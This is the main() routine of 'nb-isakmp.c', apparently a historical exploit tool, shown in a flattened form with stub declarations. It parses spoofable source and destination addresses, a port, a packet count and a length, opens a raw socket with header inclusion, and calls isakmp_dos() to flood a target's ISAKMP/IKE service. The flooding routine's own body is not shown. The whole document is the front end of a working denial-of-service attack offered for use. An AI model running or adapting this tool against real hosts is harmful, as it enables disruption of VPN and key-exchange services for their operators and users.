
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_long ;
struct option {char* member_0; int member_1; char member_3; int member_2; } ;
typedef int nbs ;


 int AF_INET ;
 int IPPROTO_IP ;
 int IPPROTO_RAW ;
 int IP_HDRINCL ;
 int ISAKMP_LEN ;
 int SIGHUP ;
 int SIGINT ;
 int SIGKILL ;
 int SIGQUIT ;
 int SIGTERM ;
 int SIG_IGN ;
 int SOCK_RAW ;
 int atoi (int ) ;
 int die (char*) ;
 int getip (int ) ;
 int getopt_long (int,char**,char*,struct option*,int*) ;
 int isakmp_dos (int,int ,int ,int,int,int,int) ;
 int optarg ;
 int printf (char*,...) ;
 scalar_t__ setsockopt (int,int ,int ,char*,int) ;
 int signal (int ,int ) ;
 int socket (int ,int ,int ) ;
 int u_abort ;
 char* usage (char*) ;

int main(int argc, char **argv){

        char *version = "0.4a";

        u_long source, destination;

        int lineopt,

            port = 0,

            nb,

            nbs = 1,

            loop = 0,

            number = 0,

            pkt_len,

            src_ok = 0,

            dst_ok = 0,

            length = 0;



        printf("--- nb-isakmp.c v.%s / Nelson Brito / Independent Security Consultant ---\n", version);



        (argc < 4) ? usage(argv[0]) : (char *)((void*)0);



        signal(SIGHUP, SIG_IGN);

        signal(SIGINT, u_abort);

        signal(SIGTERM, u_abort);

        signal(SIGKILL, u_abort);

        signal(SIGQUIT, u_abort);



        while(1){

                static struct option my_opt[]={

                        {"source", 1, 0, 's'},

                        {"destination", 1, 0, 'd'},

                        {"port", 1, 0, 'p'},

                        {"number", 1, 0, 'n'},

                        {"length", 1, 0, 'l'},

                        {"loop", 0, 0, 'L'},

                        {"help", 0, 0, 'h'},

                        {0, 0, 0, 0}

                };

                int option_index = 0;

                lineopt = getopt_long(argc, argv, "s:d:p:n:l:Lh", my_opt, &option_index);



                if(lineopt == -1) break;



                switch(lineopt){

                        case 's':

                                source = getip(optarg);

                                src_ok++;

                                break;

                        case 'd':

                                destination = getip(optarg);

                                dst_ok++;

                                break;

                        case 'p':

                                port = atoi(optarg);

                                if((port <= 0) || (port > 65535))

                                        die("main(): port range error.");

                                break;

                        case 'n':

                                number = atoi(optarg);

                                break;

                        case 'l':

                                length = atoi(optarg);

                                break;

                        case 'L':

                                loop++;

                                break;

                        case 'h':

                        default:

                                usage(argv[0]);

                                break;

                }

        }



        if((!src_ok) && (!dst_ok)) usage(argv[0]);



        if((nb = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))< 0)


                die("main(): socket() error.");



        if(setsockopt(nb, IPPROTO_IP, IP_HDRINCL, (char *)&nbs, sizeof(nbs)) < 0)

                die("main(): setsockopt() error.");



        pkt_len = length ? length : ISAKMP_LEN;



        if((isakmp_dos(nb, source, destination, port, number, loop, pkt_len)) == -1)

                die("main(): isakmp_dos() error");



        printf("\nRock my world, baby!\n");

        return(1);

}
